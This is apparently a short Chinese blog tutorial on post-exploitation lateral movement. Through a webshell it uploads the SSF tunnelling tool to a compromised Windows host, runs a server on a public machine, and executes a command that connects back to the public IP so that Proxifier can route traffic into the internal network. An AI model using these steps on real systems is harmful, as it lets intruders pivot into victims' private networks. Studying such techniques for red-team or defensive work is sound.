【横向】Webshell利用SSF+Proxifier反向代理内网流量到公网

首先我们将以下文件上传到webshell端:

certs目录
ssf.exe

图片[1]-【横向】Webshell利用SSF+Proxifier反向代理内网流量到公网-赤道学院

Webshell
新建cert目录
图片[2]-【横向】Webshell利用SSF+Proxifier反向代理内网流量到公网-赤道学院

接着在certs目录新建trusted目录
图片[3]-【横向】Webshell利用SSF+Proxifier反向代理内网流量到公网-赤道学院
上传这些文件
图片[4]-【横向】Webshell利用SSF+Proxifier反向代理内网流量到公网-赤道学院
图片[5]-【横向】Webshell利用SSF+Proxifier反向代理内网流量到公网-赤道学院
接着继续上传trusted目录下的文件到webshell的trusted目录下
图片[6]-【横向】Webshell利用SSF+Proxifier反向代理内网流量到公网-赤道学院
接着回到ssf目录,上传ssf.exe
图片[7]-【横向】Webshell利用SSF+Proxifier反向代理内网流量到公网-赤道学院
图片[8]-【横向】Webshell利用SSF+Proxifier反向代理内网流量到公网-赤道学院
图片[9]-【横向】Webshell利用SSF+Proxifier反向代理内网流量到公网-赤道学院

**公网服务器

执行

`ssfd.exe -p 8888

图片[10]-【横向】Webshell利用SSF+Proxifier反向代理内网流量到公网-赤道学院
图片[11]-【横向】Webshell利用SSF+Proxifier反向代理内网流量到公网-赤道学院

**Webshell

执行

`/c CD C:\Windows\Temp\SSF\ & SSF.EXE -F 9999 -p 8888 公网IP地址

图片[12]-【横向】Webshell利用SSF+Proxifier反向代理内网流量到公网-赤道学院

**Proxifier设置
图片[13]-【横向】Webshell利用SSF+Proxifier反向代理内网流量到公网-赤道学院
图片[14]-【横向】Webshell利用SSF+Proxifier反向代理内网流量到公网-赤道学院

Success

图片[15]-【横向】Webshell利用SSF+Proxifier反向代理内网流量到公网-赤道学院

上面有几幅图中创建的cert目录是错的,应该是创建certs目录。我最后改了过来,所以不用奇怪。

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 共1条

请登录后发表评论

    暂无评论内容